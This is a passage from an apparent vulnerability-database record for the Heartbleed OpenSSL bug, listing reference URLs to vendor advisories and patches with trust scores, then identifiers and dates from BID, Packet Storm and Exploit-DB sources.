url: | http://blogs.sophos.com/2014/04/09/utm-up2date-9-111-released-fix-for-openssl-vulnerability-heartbleed/ | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037383 | Trust: 0.3 |
url: | https://www.whatsupgold.com/blog/2014/04/10/ipswitchs-response-heartbleed-ssl-vulnerability/ | Trust: 0.3 |
url: | http://openvpn.net/index.php/open-source/downloads.html | Trust: 0.3 |
url: | http://www.maxum.com/rumpus/blog/sslvulnerabilities.html | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/136 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04268239 | Trust: 0.3 |
url: | http://support.attachmate.com/techdocs/2724.html | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04263038 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21673481 | Trust: 0.3 |
url: | http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-332187.htm | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670576 | Trust: 0.3 |
url: | https://www-304.ibm.com/support/docview.wss?uid=swg21670750 | Trust: 0.3 |
url: | http://learn.extremenetworks.com/rs/extreme/images/cert_vu%23720951_vulnerability_advisory_04_11_2014v2.pdf | Trust: 0.3 |
url: | http://www.nowsms.com/heartbeat-ssltls-fix-for-nowsms | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na- c04262670 | Trust: 0.3 |
url: | https://rhn.redhat.com/errata/rhsa-2014-0377.html | Trust: 0.3 |
url: | http://www.splunk.com/view/sp-caaamb3 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04239372 | Trust: 0.3 |
url: | http://support.attachmate.com/techdocs/2725.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=isg3t1020714&aid=1 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670858 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670018 | Trust: 0.3 |
url: | http://www.arubanetworks.com/support/alerts/aid-040814.asc | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg24037382 | Trust: 0.3 |
url: | http://www.bmc.com/support/support-news/openssl_cve-2014-0160.html | Trust: 0.3 |
url: | http://www.symantec.com/business/support/index?page=content&id=tech216558 | Trust: 0.3 |
url: | http://www.soliton.co.jp/support/news/important/20140410.html | Trust: 0.3 |
url: | http://www.symantec.com/business/support/index?page=content&id=tech216555 | Trust: 0.3 |
url: | http://tomcat.apache.org/native-doc/miscellaneous/changelog.html | Trust: 0.3 |
url: | http://help.filemaker.com/app/answers/detail/a_id/13386/ | Trust: 0.3 |
url: | http://www.vandyke.com/support/advisory/2014/05/index.html | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004643 | Trust: 0.3 |
url: | https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_openssl5 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas3824bd213d0f7c3d086257cc10063152c | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04307186 | Trust: 0.3 |
url: | http://scn.sap.com/community/sql-anywhere/blog/2014/04/11/openssl-heartbleed-and-sql-anywhere | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21671130 | Trust: 0.3 |
url: | http://kb.globalscape.com/knowledgebasearticle11166.aspx | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04272892 | Trust: 0.3 |
url: | https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-april/000184.html | Trust: 0.3 |
url: | http://watchguardsecuritycenter.com/2014/04/09/11-8-3-update-1-now-available-to-fix-heartbleed-vulnerabilty-in-fireware-xtm-os/ | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04275280 | Trust: 0.3 |
url: | http://ics-cert.us-cert.gov/advisories/icsa-14-128-01 | Trust: 0.3 |
url: | http://www.trianglemicroworks.com/products/scada-data-gateway/what%27s-new | Trust: 0.3 |
url: | https://downloads.avaya.com/css/p8/documents/100179858 | Trust: 0.3 |
url: | https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docdisplay?docid=emr_na-c04255796 | Trust: 0.3 |
url: | http://www.atvise.com/en/news-events/news/260-important-security-update-heartbleed-bug | Trust: 0.3 |
url: | https://support.norton.com/sp/en/us/home/current/solutions/v98431836_enduserprofile_en_us | Trust: 0.3 |
url: | http://support.citrix.com/article/ctx140698 | Trust: 0.3 |
url: | https://h20566.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?spf_p.tpst=kbdocdisplay&spf_p.prp_kbdocdisplay=wsrp-navigationalstate%3ddocid%253demr_na-c04260456-2%257cdoclocale%253de | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670640 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670388 | Trust: 0.3 |
url: | http://support.kaspersky.com/10235#block0 | Trust: 0.3 |
url: | https://bitcoin.org/en/release/v0.9.1 | Trust: 0.3 |
url: | https://kb.juniper.net/infocenter/index?page=content&id=jsa10623&cat=sirt_1&actp=list&showdraft=false | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21672507 | Trust: 0.3 |
url: | http://support.attachmate.com/techdocs/1708.html | Trust: 0.3 |
url: | http://www.websense.com/content/support/library/ni/shared/security-alerts/openssl-vul-2014.pdf | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg21670015 | Trust: 0.3 |
url: | http://www.enterprisedb.com/products-services-training/pgdownload | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/139 | Trust: 0.3 |
url: | https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00 | Trust: 0.3 |
url: | http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5095066 | Trust: 0.3 |
url: | http://seclists.org/bugtraq/2014/apr/138 | Trust: 0.3 |
SOURCES
db: | BID | id: | 66690 |
db: | PACKETSTORM | id: | 126072 |
db: | PACKETSTORM | id: | 126308 |
db: | PACKETSTORM | id: | 126288 |
db: | PACKETSTORM | id: | 126090 |
db: | PACKETSTORM | id: | 126065 |
db: | PACKETSTORM | id: | 126048 |
db: | PACKETSTORM | id: | 126069 |
db: | PACKETSTORM | id: | 151177 |
db: | PACKETSTORM | id: | 126102 |
db: | PACKETSTORM | id: | 126070 |
db: | PACKETSTORM | id: | 126100 |
db: | PACKETSTORM | id: | 126272 |
db: | PACKETSTORM | id: | 126101 |
db: | EXPLOIT-DB | id: | 32791 |
db: | EDBNET | id: | 21855 |
db: | EDBNET | id: | 78335 |
db: | EDBNET | id: | 80511 |
db: | EDBNET | id: | 54305 |
db: | EDBNET | id: | 21866 |
LAST UPDATE DATE
2022-06-21T14:08:19.863000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 66690 | date: | 2016-07-06T14:40:00 |
SOURCES RELEASE DATE
db: | BID | id: | 66690 | date: | 2014-04-07T00:00:00 |
db: | PACKETSTORM | id: | 126072 | date: | 2014-04-09T22:35:29 |
db: | PACKETSTORM | id: | 126308 | date: | 2014-04-24T22:39:43 |
db: | PACKETSTORM | id: | 126288 | date: | 2014-04-23T13:03:33 |
db: | PACKETSTORM | id: | 126090 | date: | 2014-04-09T22:58:03 |
db: | PACKETSTORM | id: | 126065 | date: | 2014-04-08T22:48:10 |
db: | PACKETSTORM | id: | 126048 | date: | 2014-04-08T21:17:48 |
db: | PACKETSTORM | id: | 126069 | date: | 2014-04-09T02:10:44 |
db: | PACKETSTORM | id: | 151177 | date: | 2019-01-16T15:09:40 |
db: | PACKETSTORM | id: | 126102 | date: | 2014-04-10T19:03:43 |
db: | PACKETSTORM | id: | 126070 | date: | 2014-04-08T14:04:44 |
db: | PACKETSTORM | id: | 126100 | date: | 2014-04-10T03:13:49 |
db: | PACKETSTORM | id: | 126272 | date: | 2014-04-23T06:15:25 |
db: | PACKETSTORM | id: | 126101 | date: | 2014-04-10T15:06:42 |
db: | EXPLOIT-DB | id: | 32791 | date: | 2014-04-10T00:00:00 |
db: | EDBNET | id: | 21855 | date: | 2014-04-09T00:00:00 |
db: | EDBNET | id: | 78335 | date: | 2014-04-16T00:00:00 |
db: | EDBNET | id: | 80511 | date: | 2015-04-23T00:00:00 |
db: | EDBNET | id: | 54305 | date: | 2014-04-10T00:00:00 |
db: | EDBNET | id: | 21866 | date: | 2014-04-10T00:00:00 |